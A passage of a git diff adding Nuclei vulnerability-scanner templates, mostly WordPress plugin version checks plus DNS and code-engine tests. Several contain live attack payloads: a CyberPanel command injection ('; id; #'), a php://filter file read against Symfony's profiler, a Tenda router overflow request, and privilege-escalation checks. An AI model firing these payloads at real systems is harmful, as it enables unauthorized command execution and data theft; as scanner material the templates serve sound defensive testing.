reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,newsletters-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.9.4') \ No newline at end of file diff --git a/poc/other/ns.yaml b/poc/other/ns.yaml new file mode 100644 index 0000000000..9d40655743 --- /dev/null +++ b/poc/other/ns.yaml @@ -0,0 +1,18 @@ +id: dns-ns-query-example + +info: + name: Test DNS NS Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: NS + class: inet + recursion: true + retries: 3 + matchers: + - type: word + part: all + words: + - "NS" diff --git a/poc/other/nuclei-flow-dns-prefix.yaml b/poc/other/nuclei-flow-dns-prefix.yaml new file mode 100644 index 0000000000..8d5f7906c6 --- /dev/null +++ b/poc/other/nuclei-flow-dns-prefix.yaml @@ -0,0 +1,40 @@ +id: nuclei-flow-dns + +info: + name: Nuclei flow dns + author: pdteam + severity: info + description: Description of the Template + reference: https://example-reference-link + +flow: | + dns(1); + template["nameservers"].forEach(nameserver => { + set("nameserver",nameserver); + dns(2); + }); + +dns: + - name: "{{FQDN}}" + type: NS + matchers: + - type: word + words: + - "IN\tNS" + extractors: + - type: regex + internal: true + name: "nameservers" + group: 1 + regex: + - "IN\tNS\t(.+)" + + - name: "{{nameserver}}" + type: A + class: inet + retries: 3 + recursion: true + extractors: + - type: dsl + dsl: + - "a" \ No newline at end of file diff --git a/poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml b/poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml new file mode 100644 index 0000000000..2cd060edbb --- /dev/null +++ b/poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml @@ -0,0 +1,59 @@ +id: post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1 + +info: + name: > + Post Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-status-notifier/" + google-query: inurl:"/wp-content/plugins/post-status-notifier/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-status-notifier,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-status-notifier/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-status-notifier" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.6') \ No newline at end of file diff --git a/poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml b/poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml new file mode 100644 index 0000000000..fc6fa48c04 --- /dev/null +++ b/poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml @@ -0,0 +1,59 @@ +id: post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1 + +info: + name: > + Post Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-status-notifier-lite/" + google-query: inurl:"/wp-content/plugins/post-status-notifier-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-status-notifier-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-status-notifier-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-status-notifier-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.6') \ No newline at end of file diff --git a/poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml b/poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml new file mode 100644 index 0000000000..2611d27e70 --- /dev/null +++ b/poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml @@ -0,0 +1,59 @@ +id: premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928 + +info: + name: > + Premium Addons for Elementor <= 4.10.60 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Video Box Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6102c07-2776-4963-8d16-a779c5979275?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/premium-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.10.60') \ No newline at end of file diff --git a/poc/other/privesc-agetty.yaml b/poc/other/privesc-agetty.yaml new file mode 100644 index 0000000000..51fef6b33a --- /dev/null +++ b/poc/other/privesc-agetty.yaml @@ -0,0 +1,41 @@ +id: privesc-agetty + +info: + name: agetty - Privilege Escalation + author: bobakabill + severity: high + description: | + The agetty command in Linux is used to invoke the /bin/login command for a given user. If the SUID bit is set, it can be used to gain a high-privilege s> + reference: + - https://gtfobins.github.io/gtfobins/agetty/ + metadata: + verified: true + max-request: 3 + tags: code,linux,find,privesc,local + +self-contained: true +code: + - engine: + - sh + - bash + source: | + find /usr/sbin/agetty -perm /4000 + + - engine: + - sh + - bash + source: | + find /usr/sbin/agetty -perm /6000 + + matchers-condition: or + matchers: + - type: word + part: code_1_response + words: + - "/usr/sbin/agetty" + + - type: word + part: code_2_response + words: + - "/usr/sbin/agetty" +# digest: 4a0a00473045022100a538ae5a5fe0337a1441bce017745d6bd64eec5fcc941fde9708a999469ad9ce0220556e7c14a79a88d1e5e37309085d79af25d63bfd83ccb0b80d5f4857b21b diff --git a/poc/other/ps1-snippet.yaml b/poc/other/ps1-snippet.yaml new file mode 100644 index 0000000000..9d6c91f06d --- /dev/null +++ b/poc/other/ps1-snippet.yaml @@ -0,0 +1,28 @@ +id: ps1-code-snippet + +info: + name: ps1-code-snippet + author: pdteam + severity: info + tags: code + description: | + ps1-code-snippet + +code: + - engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + - -File + pattern: "*.ps1" + source: | + $stdin = [Console]::In + $line = $stdin.ReadLine() + Write-Host "hello from $line" + + matchers: + - type: word + words: + - "hello from input" \ No newline at end of file diff --git a/poc/other/py-file.yaml b/poc/other/py-file.yaml new file mode 100644 index 0000000000..3521ec902d --- /dev/null +++ b/poc/other/py-file.yaml @@ -0,0 +1,21 @@ +id: py-file + +info: + name: py-file + author: pdteam + severity: info + tags: code + description: | + py-file + +code: + - engine: + - py + - python3 + source: protocols/code/pyfile.py + + matchers: + - type: word + words: + - "hello from input" +# digest: 4b0a00483046022100afb5ebff14a40e7f9b679ffc4d93ce7849e33eb398ebb47f2e757cd24831f9dd02210089ffa21b2763e99ebce95dfc5b91e1e62da4ccdc9d2ad5c48584fa350ba335af:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/py-interactsh.yaml b/poc/other/py-interactsh.yaml new file mode 100644 index 0000000000..0ccab7a7cd --- /dev/null +++ b/poc/other/py-interactsh.yaml @@ -0,0 +1,29 @@ +id: testcode + +info: + name: testcode + author: testcode + severity: info + tags: code + description: | + testcode + +variables: + i: "{{interactsh-url}}" + +code: + - engine: + - py + - python3 + # Simulate interactsh interaction + source: | + import os + from urllib.request import urlopen + urlopen("http://" + os.getenv('i')) + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" +# digest: 4b0a00483046022100939f83e74d43932a5bd792b1fd2c100eec2df60f2b2a8dd56b5c8ef5faa92b17022100f93031b0de373af7d78e623968ea5a2d67c4561ef70e3e6da15aef7e5c853115:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/py-nosig.yaml b/poc/other/py-nosig.yaml new file mode 100644 index 0000000000..d8bd0ac6ac --- /dev/null +++ b/poc/other/py-nosig.yaml @@ -0,0 +1,21 @@ +id: py-nosig + +info: + name: py-nosig + author: pdteam + severity: info + tags: code + description: | + Python code without signature + +code: + - engine: + - py + - python3 + source: | + print("py unsigned code") + + matchers: + - type: word + words: + - "py unsigned code" \ No newline at end of file diff --git a/poc/other/py-snippet.yaml b/poc/other/py-snippet.yaml new file mode 100644 index 0000000000..067c183bb7 --- /dev/null +++ b/poc/other/py-snippet.yaml @@ -0,0 +1,23 @@ +id: py-code-snippet + +info: + name: py-code-snippet + author: pdteam + severity: info + tags: code + description: | + py-code-snippet + +code: + - engine: + - py + - python3 + source: | + import sys,os + print("hello from " + sys.stdin.read() + " " + os.getenv('baz')) + + matchers: + - type: word + words: + - "hello from input baz" +# digest: 4a0a0047304502203fe1d7d52bc2a41886d576a90c82c3be42078baaa4b46e1f3d8519665d6f88b202210081feb82c41150c5b218e226fc4f299ded19f42ba01ef34ba60b0634b4ea6ee12:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/quivr-panel.yaml b/poc/other/quivr-panel.yaml new file mode 100644 index 0000000000..4e681786fd --- /dev/null +++ b/poc/other/quivr-panel.yaml @@ -0,0 +1,27 @@ +id: quivr-panel + +info: + name: Quivr Panel - Detect + author: s4e-io + severity: info + description: | + Quivr panel was discovered. + reference: + - https://github.com/QuivrHQ/quivr + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="848114197" + tags: panel,login,quivr,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: dsl + dsl: + - 'contains_any(body, "Quivr - Get a Second Brain with Generative AI", "data-sentry-component=\"QuivrLogo\"")' + - 'status_code == 200' + condition: and diff --git a/poc/other/raw-path-single-slash.yaml b/poc/other/raw-path-single-slash.yaml new file mode 100644 index 0000000000..4ea491f4be --- /dev/null +++ b/poc/other/raw-path-single-slash.yaml @@ -0,0 +1,13 @@ +id: raw-path-single-slash + +info: + name: Test RAW HTTP Template with single slash + author: pdteam + severity: info + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} \ No newline at end of file diff --git a/poc/other/raw-unsafe-path-single-slash.yaml b/poc/other/raw-unsafe-path-single-slash.yaml new file mode 100644 index 0000000000..a356d18e80 --- /dev/null +++ b/poc/other/raw-unsafe-path-single-slash.yaml @@ -0,0 +1,15 @@ +id: raw-unsafe-path-single-slash + +info: + name: Test RAW Unsafe HTTP Template with single slash + author: pdteam + severity: info + +requests: + - raw: + - |+ + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + unsafe: true \ No newline at end of file diff --git a/poc/other/same-address.yaml b/poc/other/same-address.yaml new file mode 100644 index 0000000000..5cad9d21fb --- /dev/null +++ b/poc/other/same-address.yaml @@ -0,0 +1,29 @@ +id: same-target + +info: + name: same-target + author: pdteam + severity: info + description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability. + +network: + - host: + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + - "{{Hostname}}" + inputs: + - data: "PING\r\n" + read-size: 4 + matchers: + - type: word + part: data + words: + - "PONG" diff --git a/poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml b/poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml new file mode 100644 index 0000000000..68dfc2f474 --- /dev/null +++ b/poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml @@ -0,0 +1,59 @@ +id: seur-710adeba52f1b42ddecb78da2e1d3776 + +info: + name: > + SEUR Oficial <= 2.2.11 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88edf229-2be2-49d0-b500-e8ff7708f806?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/seur/" + google-query: inurl:"/wp-content/plugins/seur/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,seur,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/seur/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "seur" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.11') \ No newline at end of file diff --git a/poc/other/sf2-profiler-exploit.yaml b/poc/other/sf2-profiler-exploit.yaml new file mode 100644 index 0000000000..5494363ba6 --- /dev/null +++ b/poc/other/sf2-profiler-exploit.yaml @@ -0,0 +1,44 @@ +# UNIQUE ID +id: sf2-profiler-exploit + +# INFORMATION SECTION +info: + name: Symfony2 < 2.5.4 Profiler SQL Injection + author: rrandellusa + severity: High + description: This template detects the presence of the Symfony 2.5.4 Profiler toolbar, which can be exploited to expose sensitive information. + tags: symfony, SQL, injection + +# PROTOCOL SECTION +http: + - method: GET + path: + - "{{BaseURL}}/_profiler/" + - "{{BaseURL}}/_profiler/phpinfo" + - "{{BaseURL}}/_profiler/router" + - "{{BaseURL}}/_profiler/open?file=php://filter/convert.base64-encode/resource=config/services.yml" + + matchers-condition: or + matchers: + - type: word + words: + - "Symfony Profiler" + - "Profiler" + - "Symfony" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "
+ SW Kick Integration - Blocks and Shortcodes for Embedding Kick Streams <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-kick-embed Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/077a31e7-de4b-418f-ac90-5c51a690bc65?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/streamweasels-kick-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-kick-integration/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,streamweasels-kick-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-kick-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-kick-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml b/poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml new file mode 100644 index 0000000000..d4e97d7842 --- /dev/null +++ b/poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml @@ -0,0 +1,59 @@ +id: streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d + +info: + name: > + StreamWeasels YouTube Integration <= 1.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-youtube-embed Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/streamweasels-youtube-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-youtube-integration/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,streamweasels-youtube-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-youtube-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-youtube-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2') \ No newline at end of file diff --git a/poc/other/tenda-fh451-stack-overflow.yaml b/poc/other/tenda-fh451-stack-overflow.yaml new file mode 100644 index 0000000000..b16875a0c2 --- /dev/null +++ b/poc/other/tenda-fh451-stack-overflow.yaml @@ -0,0 +1,36 @@ +id: tenda-fh451-stack-overflow + +info: + name: Tenda FH451 v1.0.0.9 - Stack Overflow + author: vidura2 + severity: high + description: | + This template detects a stack overflow vulnerability in Tenda FH451 v1.0.0.9. The vulnerability exists in the RouteStatic function, allowing attackers to send overly long input data causing a buffer overflow, which could lead to remote code execution (RCE). + reference: + - https://github.com/BenJpopo/V/blob/main/Tenda/FH451/RouteStatic.md + tags: tenda,overflow,rce + +http: + - method: POST + path: + - "{{BaseURL}}/goform/setcfm" + body: | + funcname=save_list_data&funcpara1={{overflow_payload}}&funcpara2=aaaaaa + headers: + Content-Type: application/x-www-form-urlencoded + + payloads: + overflow_payload: + - "{{'a' * 0x500}}" # Overflow payload + + matchers-condition: and + matchers: + - type: word + words: + - "error" + - "successful" + condition: and + + - type: status + status: + - 200 diff --git a/poc/other/txt.yaml b/poc/other/txt.yaml new file mode 100644 index 0000000000..273a53ab7d --- /dev/null +++ b/poc/other/txt.yaml @@ -0,0 +1,18 @@ +id: dns-txt-query-example + +info: + name: Test DNS TXT Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: TXT + class: inet + recursion: true + retries: 3 + matchers: + - type: word + part: all + words: + - "TXT" diff --git a/poc/other/unquoted-service-pathcheck.yaml b/poc/other/unquoted-service-pathcheck.yaml new file mode 100644 index 0000000000..e4258161b2 --- /dev/null +++ b/poc/other/unquoted-service-pathcheck.yaml @@ -0,0 +1,52 @@ +id: unquoted-service-pathcheck + +info: + name: Unquoted Service PathCheck + author: pussycat0x + severity: high + description: | + The Unquoted Service Path vulnerability in Windows occurs when services are installed using paths containing spaces without proper quotation marks. If attackers obtain write permissions in the service's installation directory, they can execute malicious code with elevated privileges. + tags: code,windows,privesc,ps + +self-contained: true +code: + - engine: + - powershell + - powershell.exe + + args: + - -ExecutionPolicy + - Bypass + - -File + + pattern: "*.ps1" + + source: | + Write-Host "Fetching the list of services, this may take a while..."; + + # Get the list of services that meet the criteria + $services = Get-WmiObject -Class Win32_Service | + Where-Object { + $_.PathName -inotmatch "`"" -and # Service path does not contain quotes + $_.PathName -inotmatch ":\\Windows\\" -and + ($_.StartMode -eq "Auto" -or $_.StartMode -eq "Manual") -and + ($_.State -eq "Running" -or $_.State -eq "Stopped") + }; + + # Check if any services meet the criteria + if ($($services | Measure-Object).Count -lt 1) { + Write-Host "No unquoted service paths were found."; + } else { + Write-Host "Unquoted service paths were found:"; + foreach ($service in $services) { + Write-Host "Service Name: $($service.Name)"; + Write-Host "Display Name: $($service.DisplayName)"; + Write-Host "Path: $($service.PathName)"; + Write-Host "----------------------------------"; + } + } + + extractors: + - type: dsl + dsl: + - response diff --git a/poc/other/unsigned.yaml b/poc/other/unsigned.yaml new file mode 100644 index 0000000000..7e483f0e8e --- /dev/null +++ b/poc/other/unsigned.yaml @@ -0,0 +1,21 @@ +id: unsigned-code-snippet + +info: + name: unsigned-code-snippet + author: pdteam + severity: info + tags: code + description: | + unsigned-code-snippet + +code: + - engine: + - py + - python3 + source: | + print("unsigned code") + + matchers: + - type: word + words: + - "unsigned code" \ No newline at end of file diff --git a/poc/remote_code_execution/cyberpanel-rce.yaml b/poc/remote_code_execution/cyberpanel-rce.yaml new file mode 100644 index 0000000000..7a257e1cf1 --- /dev/null +++ b/poc/remote_code_execution/cyberpanel-rce.yaml @@ -0,0 +1,58 @@ +id: cyberpanel-rce + +info: + name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution + author: DhiyaneshDK + severity: critical + description: | + CyberPanel v2.3.6 has a critical vulnerability that allows remote attackers to execute arbitrary commands on the server without prior authentication. + impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server. + reference: + - https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760 + - https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce + metadata: + verified: true + max-request: 2 + shodan-query: html:"CyberPanel" + tags: cyberpanel,rce,intrusive + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + PUT /dataBases/upgrademysqlstatus HTTP/1.1 + Host: {{Hostname}} + X-CSRFToken: {{csrftoken}} + Content-Type: application/json + Referer: {{RootURL}} + Cookie: csrftoken={{csrftoken}} + + {"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"} + + extractors: + - type: regex + part: header + name: csrftoken + internal: true + group: 1 + regex: + - csrftoken=([A-Za-z0-9]+) + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "uid=" + - "error_message" + - "requestStatus" + condition: and + + - type: status + status: + - 200 diff --git a/poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml b/poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml new file mode 100644 index 0000000000..8af931c002 --- /dev/null +++ b/poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10181-21fdb15695068521f367ac81bba91927 + +info: + name: > + Newsletters <= 4.9.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via newsletters_video Shortcode + author: topscoder + severity: low + description: > + The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10181 + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:CVE-2024-10181' + tags: cve,wordpress,wp-plugin,newsletters-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.9.4') \ No newline at end of file diff --git a/poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml b/poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml new file mode 100644 index 0000000000..5f7009d3ef --- /dev/null +++ b/poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29 + +info: + name: > + Arconix Shortcodes <= 2.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via box Shortcode + author: topscoder + severity: low + description: > + The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10226 + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:CVE-2024-10226' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.13') \ No newline at end of file diff --git a/poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml b/poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml new file mode 100644 index 0000000000..55bed6d7bc --- /dev/null +++ b/poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a + +info: + name: > + SMSAlert - WooCommerce <= 3.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via sa_subscribe Shortcode + author: topscoder + severity: low + description: > + The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_subscribe shortcode in all versions up to, and including, 3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10233 + metadata: + fofa-query: "wp-content/plugins/sms-alert/" + google-query: inurl:"/wp-content/plugins/sms-alert/" + shodan-query: 'vuln:CVE-2024-10233' + tags: cve,wordpress,wp-plugin,sms-alert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sms-alert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sms-alert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.5') \ No newline at end of file diff --git a/poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml b/poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml new file mode 